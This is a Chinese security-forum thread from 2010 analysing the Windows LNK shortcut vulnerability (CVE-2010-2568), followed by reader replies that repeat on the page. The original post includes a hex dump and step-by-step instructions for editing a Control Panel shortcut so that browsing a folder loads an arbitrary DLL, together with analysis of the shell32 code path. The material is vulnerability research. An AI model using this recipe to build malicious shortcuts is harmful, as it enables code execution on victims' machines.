[原创]LNK快捷方式文件漏洞简要分析-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]LNK快捷方式文件漏洞简要分析

发表于: 2010-7-22 00:04 74846

[原创]LNK快捷方式文件漏洞简要分析

isno

2010-7-22 00:04

74846

前言
    windows的shell32在处理控制面板程序的快捷方式文件时，存在一个漏洞，可以加载硬盘上的任意DLL文件，即可执行任意代码。

漏洞文件的生成
    到“控制面板”下面，右键点“显示”，点“创建快捷方式”，把快捷方式创建在桌面上。然后在桌面用WinHex打开“显示.lnk”文件。

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000   4C 00 00 00 01 14 02 00  00 00 00 00 C0 00 00 00   L...........?..
00000010   00 00 00 46 81 00 00 00  00 00 00 00 00 00 00 00   ...F?..........
00000020   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000030   00 00 00 00 00 00 00 00  00 00 00 00 01 00 00 00   ................
00000040   00 00 00 00 00 00 00 00  00 00 00 00 CC 00 14 00   ............?..
00000050   1F 50 E0 4F D0 20 EA 3A  69 10 A2 D8 08 00 2B 30   .P郞??i.⒇..+0
00000060   30 9D 14 00 2E 00 20 20  EC 21 EA 3A 69 10 A2 DD   0?...  ??i.⑤
00000070   08 00 2B 30 30 9D A2 00  00 00 9C FF FF FF 00 00   ..+00潰...?..
00000080   00 00 00 6A 00 00 00 00  00 00 1D 00 20 00 44 00   ...j........ .D.
00000090   3A 00 5C 00 57 00 49 00  4E 00 44 00 4F 00 57 00   :.\.W.I.N.D.O.W.
000000A0   53 00 5C 00 73 00 79 00  73 00 74 00 65 00 6D 00   S.\.s.y.s.t.e.m.
000000B0   33 00 32 00 5C 00 64 00  65 00 73 00 6B 00 2E 00   3.2.\.d.e.s.k...
000000C0   63 00 70 00 6C 00 00 00  3E 66 3A 79 00 00 F4 66   c.p.l...>f:y..鬴
000000D0   39 65 A8 60 84 76 4C 68  62 97 84 76 16 59 C2 89   9e╜剉Lhb梽v.Y
000000E0   0C FF 8B 4F 82 59 CC 80  6F 66 01 30 4F 5C 55 5E   .婳俌虁of.0O\U^
000000F0   DD 4F A4 62 0B 7A 8F 5E  01 30 9C 98 72 82 01 30   軴.z廭.0湗r?0
00000100   57 5B 53 4F 27 59 0F 5C  8C 54 4F 5C 55 5E 06 52   W[SO'Y.\孴O\U^.R
00000110   A8 8F 87 73 02 30 00 00  00 00 00 00 00 00         ◤噑.0........

把偏移7A处的9C FF FF FF改成00 00 00 00，把后面的文件名D:\WINDOWS\system32\desk.cpl改成C:\dll.dll（UNICODE格式）。保存文件。把这个文件复制到任意目录下，当用户浏览该目录时，就会加载C:\dll.dll文件。
Lnk文件格式的相关地方
Lnk的目标文件存放在Shell Item Id List的SHITEMID结构里面，这个结构是按照层来表示一个目标的。上面那个lnk文件里面，第一层是
14 00   ............?..
00000050   1F 50 E0 4F D0 20 EA 3A  69 10 A2 D8 08 00 2B 30   .P郞??i.⒇..+0
00000060   30 9D
14 00代表长度，后面的16字节是“我的电脑”的GUID {20D04FE0-3AEA-1069-A2D8-08002B30309D}，注册表里可以搜到。第二层是
14 00 2E 00 20 20  EC 21 EA 3A 69 10 A2 DD   0?...  ??i.⑤
00000070   08 00 2B 30 30 9D
这个是“控制面板”的GUID {21EC2020-3AEA-1069-A2DD-08002B30309D}。
第三层就是后面长度为0xA2的目标文件。这里面偏移0x7A处的9C FF FF FF是用来指明快捷方式图标的index。貌似是这样的。
所以这个Shell Item Id List所指向的文件就是：我的电脑->控制面板->D:\WINDOWS\system32\desk.cpl。
对于普通文件的快捷方式，好像是：我的电脑->盘符->目录1->目录2…->文件名。

漏洞产生的地方
    shell32在处理lnk文件的时候要把它的图标显示出来，对于一般文件应该是从Icon filename string里面解析，但对于文件后面没有Icon filename string结构的控制面板快捷方式，是直接从0x7A那里的iconindex来解析。当这个iconindex是0的时候，会去加载cpl文件，调用CPlApplet接口，这样就存在执行DLL中代码的问题。

登录后可查看完整内容

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

收藏・48

免费・7

支持

最新回复 (48) 1 2 ▶
float 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 20 粉丝 0 关注私信	float 2 楼 MARK下，学习了 2010-7-22 00:13 0
cvcvxk 雪币： 8835 活跃值： (2404) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 236 关注私信	cvcvxk 10 3 楼是在U盘上创建了26个lnk 2010-7-22 01:22 0
jerrynpc 雪币： 284 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 695 粉丝 0 关注私信	jerrynpc 4 楼 isno大侠很久没写帖子了 2010-7-22 02:37 0
ucantseeme 雪币： 442 活跃值： (43) 能力值： ( LV2，RANK：10 ) 在线值：发帖 46 回帖 990 粉丝 1 关注私信	ucantseeme 5 楼很好，学习了 2010-7-22 06:18 0
jmpjerryy 雪币： 339 活跃值： (29) 能力值： ( LV6，RANK：90 ) 在线值：发帖 5 回帖 122 粉丝 2 关注私信	jmpjerryy 2 6 楼事实上正是产生了多个lnk来实现加载，driver再隐藏了一下。不过一般来讲也用不了20多个。 2010-7-22 09:15 0
hawking 雪币： 1969 活跃值： (46) 能力值： (RANK：550 ) 在线值：发帖 37 回帖 519 粉丝 6 关注私信	hawking 12 7 楼占位学习 2010-7-22 09:44 0
zhuliang 雪币： 1098 活跃值： (193) 能力值： (RANK：210 ) 在线值：发帖 36 回帖 401 粉丝 15 关注私信	zhuliang 5 8 楼很好。那天我也调试了一下这个漏洞。 2010-7-22 10:20 0
jasonzhou 雪币： 213 活跃值： (147) 能力值： ( LV2，RANK：10 ) 在线值：发帖 20 回帖 289 粉丝 1 关注私信	jasonzhou 9 楼最近刚好遇到这个样本不过这种方法，按理说病毒已经进入到你的计算机了，所以隐藏自身可以，但是传播就不太方便了 2010-7-22 10:24 0
轩辕小聪雪币： 722 活跃值： (123) 能力值： ( LV12，RANK：300 ) 在线值：发帖 10 回帖 547 粉丝 5 关注私信	轩辕小聪 7 10 楼楼主加载shell32.dll的pdb会看得更清楚一点，那两段代码，第一段是CCtrlExtIconBase::_GetIconLocationW，第二段是CPL_LoadCPLModule，调用顺序是 CCtrlExtIconBase::_GetIconLocationW->CPL_FindCPLInfo->CPL_LoadAndFindApplet->_LoadCPLModule，这个过程在原始漏洞公布文章http://www.ivanlef0u.tuxfamily.org/?p=411中给的栈回溯信息里可以看得很清楚。 http://community.websense.com/blogs/securitylabs/archive/2010/07/20/microsoft-lnk-vulnerability-brief-technical-analysis-cve-2010-2568.aspx 这一篇文章对这几个函数功能有一定的说明。 “其实我觉得这个也不算是一个真正意义上的漏洞，因为既然要解析出图标，加载对应的DLL文件也是说得过去的，凑巧被病毒利用上了而已。” 要解析出图标，加载过程只要把文件映像进内存就行，也就是一个ZwCreateSection，或者LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE)，然后就可以找资源了，不必要调用dll文件的DllMain函数。而现在的问题是不经检测dll文件是否可信就调用DllMain函数，这样就使得不应该被信任的dll文件得到了执行的机会。漏洞有多种，因为参数检查不严而发生溢出是一种，因为信任检验机制缺失而导致不保证信任的东西获得自动执行机会，这也是一种。 2010-7-22 11:22 0
ImHolly 雪币： 412 活跃值： (30) 能力值： ( LV5，RANK：70 ) 在线值：发帖 6 回帖 293 粉丝 1 关注私信	ImHolly 1 11 楼 LS的补充很不错.... 2010-7-22 12:42 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 12 楼冒似pif文件也存在类似漏洞 2010-7-22 12:51 0
chwljy 雪币： 204 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	chwljy 13 楼不错，我做做测试，研究一下 2010-7-22 15:08 0
北极狐狸雪币： 2368 活跃值： (81) 能力值： (RANK：300 ) 在线值：发帖 46 回帖 1342 粉丝 0 关注私信	北极狐狸 7 14 楼 http://news.baike.360.cn/fw/bbs/3451604/37744558.html?recommend=1 360速度好快啊 2010-7-22 15:48 0
jguoguo 雪币： 52 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 59 粉丝 0 关注私信	jguoguo 15 楼今天实验室的人讨论了一天了···mark··和 2010-7-22 16:15 0
isno 雪币： 358 活跃值： (63) 能力值： ( LV8，RANK：130 ) 在线值：发帖 3 回帖 27 粉丝 1 关注私信	isno 3 16 楼是的，你说的没错，现在已经被病毒利用了，再怎么说都已经是安全漏洞了。但是如果当初发现漏洞的人直接把这个问题提交给微软的话，以微软的作风，绝对不承认这是一个安全漏洞，他们会告诉你这是一个小的设计缺陷，会在以后的补丁中顺带补一下。 2010-7-22 16:19 0
shlmyth 雪币： 427 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 89 粉丝 0 关注私信	shlmyth 17 楼有时间测试一下，mark了 2010-7-22 17:22 0
nkspark 雪币： 101 活跃值： (88) 能力值： ( LV2，RANK：140 ) 在线值：发帖 46 回帖 610 粉丝 0 关注私信	nkspark 3 18 楼这个要顶~~~~ 2010-7-22 18:17 0
skybright 雪币： 58 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 55 粉丝 0 关注私信	skybright 19 楼都讨论很久了。 2010-7-22 19:29 0
jguoguo 雪币： 52 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 59 粉丝 0 关注私信	jguoguo 20 楼 http://www.smxiaoqiang.cn/blog/lnk.html 是楼主的博客？ 2010-7-22 21:45 0
isno 雪币： 358 活跃值： (63) 能力值： ( LV8，RANK：130 ) 在线值：发帖 3 回帖 27 粉丝 1 关注私信	isno 3 21 楼不是 2010-7-22 23:17 0
jguoguo 雪币： 52 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 59 粉丝 0 关注私信	jguoguo 22 楼那是你原创么？？？ 2010-7-22 23:20 0
isno 雪币： 358 活跃值： (63) 能力值： ( LV8，RANK：130 ) 在线值：发帖 3 回帖 27 粉丝 1 关注私信	isno 3 23 楼 http://rat2.cn/blog/ 这个是我博客 2010-7-23 00:36 0
cvcvxk 雪币： 8835 活跃值： (2404) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 236 关注私信	cvcvxk 10 24 楼话说今天仔细想来，这玩意不是漏洞，估计是"后门"，跟当年那个WMF的一样的"后门"... 2010-7-23 01:38 0
xygwf 雪币： 91 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 126 粉丝 0 关注私信	xygwf 25 楼我把 http://www.ivanlef0u.tuxfamily.org/?p=411 页面的文件下载到本地 xp/sp3 的c盘根下面, 然后修改为suckme.lnk 并运行,没有弹出消息框啊. 2010-7-23 08:58 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

isno

发帖

回帖

130

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (48) 1 2 ▶
float 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 20 粉丝 0 关注私信	float 2 楼 MARK下，学习了 2010-7-22 00:13 0
cvcvxk 雪币： 8835 活跃值： (2404) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 236 关注私信	cvcvxk 10 3 楼是在U盘上创建了26个lnk 2010-7-22 01:22 0
jerrynpc 雪币： 284 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 695 粉丝 0 关注私信	jerrynpc 4 楼 isno大侠很久没写帖子了 2010-7-22 02:37 0
ucantseeme 雪币： 442 活跃值： (43) 能力值： ( LV2，RANK：10 ) 在线值：发帖 46 回帖 990 粉丝 1 关注私信	ucantseeme 5 楼很好，学习了 2010-7-22 06:18 0
jmpjerryy 雪币： 339 活跃值： (29) 能力值： ( LV6，RANK：90 ) 在线值：发帖 5 回帖 122 粉丝 2 关注私信	jmpjerryy 2 6 楼事实上正是产生了多个lnk来实现加载，driver再隐藏了一下。不过一般来讲也用不了20多个。 2010-7-22 09:15 0
hawking 雪币： 1969 活跃值： (46) 能力值： (RANK：550 ) 在线值：发帖 37 回帖 519 粉丝 6 关注私信	hawking 12 7 楼占位学习 2010-7-22 09:44 0
zhuliang 雪币： 1098 活跃值： (193) 能力值： (RANK：210 ) 在线值：发帖 36 回帖 401 粉丝 15 关注私信	zhuliang 5 8 楼很好。那天我也调试了一下这个漏洞。 2010-7-22 10:20 0
jasonzhou 雪币： 213 活跃值： (147) 能力值： ( LV2，RANK：10 ) 在线值：发帖 20 回帖 289 粉丝 1 关注私信	jasonzhou 9 楼最近刚好遇到这个样本不过这种方法，按理说病毒已经进入到你的计算机了，所以隐藏自身可以，但是传播就不太方便了 2010-7-22 10:24 0
轩辕小聪雪币： 722 活跃值： (123) 能力值： ( LV12，RANK：300 ) 在线值：发帖 10 回帖 547 粉丝 5 关注私信	轩辕小聪 7 10 楼楼主加载shell32.dll的pdb会看得更清楚一点，那两段代码，第一段是CCtrlExtIconBase::_GetIconLocationW，第二段是CPL_LoadCPLModule，调用顺序是 CCtrlExtIconBase::_GetIconLocationW->CPL_FindCPLInfo->CPL_LoadAndFindApplet->_LoadCPLModule，这个过程在原始漏洞公布文章http://www.ivanlef0u.tuxfamily.org/?p=411中给的栈回溯信息里可以看得很清楚。 http://community.websense.com/blogs/securitylabs/archive/2010/07/20/microsoft-lnk-vulnerability-brief-technical-analysis-cve-2010-2568.aspx 这一篇文章对这几个函数功能有一定的说明。 “其实我觉得这个也不算是一个真正意义上的漏洞，因为既然要解析出图标，加载对应的DLL文件也是说得过去的，凑巧被病毒利用上了而已。” 要解析出图标，加载过程只要把文件映像进内存就行，也就是一个ZwCreateSection，或者LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE)，然后就可以找资源了，不必要调用dll文件的DllMain函数。而现在的问题是不经检测dll文件是否可信就调用DllMain函数，这样就使得不应该被信任的dll文件得到了执行的机会。漏洞有多种，因为参数检查不严而发生溢出是一种，因为信任检验机制缺失而导致不保证信任的东西获得自动执行机会，这也是一种。 2010-7-22 11:22 0
ImHolly 雪币： 412 活跃值： (30) 能力值： ( LV5，RANK：70 ) 在线值：发帖 6 回帖 293 粉丝 1 关注私信	ImHolly 1 11 楼 LS的补充很不错.... 2010-7-22 12:42 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 12 楼冒似pif文件也存在类似漏洞 2010-7-22 12:51 0
chwljy 雪币： 204 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	chwljy 13 楼不错，我做做测试，研究一下 2010-7-22 15:08 0
北极狐狸雪币： 2368 活跃值： (81) 能力值： (RANK：300 ) 在线值：发帖 46 回帖 1342 粉丝 0 关注私信	北极狐狸 7 14 楼 http://news.baike.360.cn/fw/bbs/3451604/37744558.html?recommend=1 360速度好快啊 2010-7-22 15:48 0
jguoguo 雪币： 52 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 59 粉丝 0 关注私信	jguoguo 15 楼今天实验室的人讨论了一天了···mark··和 2010-7-22 16:15 0
isno 雪币： 358 活跃值： (63) 能力值： ( LV8，RANK：130 ) 在线值：发帖 3 回帖 27 粉丝 1 关注私信	isno 3 16 楼是的，你说的没错，现在已经被病毒利用了，再怎么说都已经是安全漏洞了。但是如果当初发现漏洞的人直接把这个问题提交给微软的话，以微软的作风，绝对不承认这是一个安全漏洞，他们会告诉你这是一个小的设计缺陷，会在以后的补丁中顺带补一下。 2010-7-22 16:19 0
shlmyth 雪币： 427 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 89 粉丝 0 关注私信	shlmyth 17 楼有时间测试一下，mark了 2010-7-22 17:22 0
nkspark 雪币： 101 活跃值： (88) 能力值： ( LV2，RANK：140 ) 在线值：发帖 46 回帖 610 粉丝 0 关注私信	nkspark 3 18 楼这个要顶~~~~ 2010-7-22 18:17 0
skybright 雪币： 58 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 55 粉丝 0 关注私信	skybright 19 楼都讨论很久了。 2010-7-22 19:29 0
jguoguo 雪币： 52 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 59 粉丝 0 关注私信	jguoguo 20 楼 http://www.smxiaoqiang.cn/blog/lnk.html 是楼主的博客？ 2010-7-22 21:45 0
isno 雪币： 358 活跃值： (63) 能力值： ( LV8，RANK：130 ) 在线值：发帖 3 回帖 27 粉丝 1 关注私信	isno 3 21 楼不是 2010-7-22 23:17 0
jguoguo 雪币： 52 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 59 粉丝 0 关注私信	jguoguo 22 楼那是你原创么？？？ 2010-7-22 23:20 0
isno 雪币： 358 活跃值： (63) 能力值： ( LV8，RANK：130 ) 在线值：发帖 3 回帖 27 粉丝 1 关注私信	isno 3 23 楼 http://rat2.cn/blog/ 这个是我博客 2010-7-23 00:36 0
cvcvxk 雪币： 8835 活跃值： (2404) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 236 关注私信	cvcvxk 10 24 楼话说今天仔细想来，这玩意不是漏洞，估计是"后门"，跟当年那个WMF的一样的"后门"... 2010-7-23 01:38 0
xygwf 雪币： 91 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 126 粉丝 0 关注私信	xygwf 25 楼我把 http://www.ivanlef0u.tuxfamily.org/?p=411 页面的文件下载到本地 xp/sp3 的c盘根下面, 然后修改为suckme.lnk 并运行,没有弹出消息框啊. 2010-7-23 08:58 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复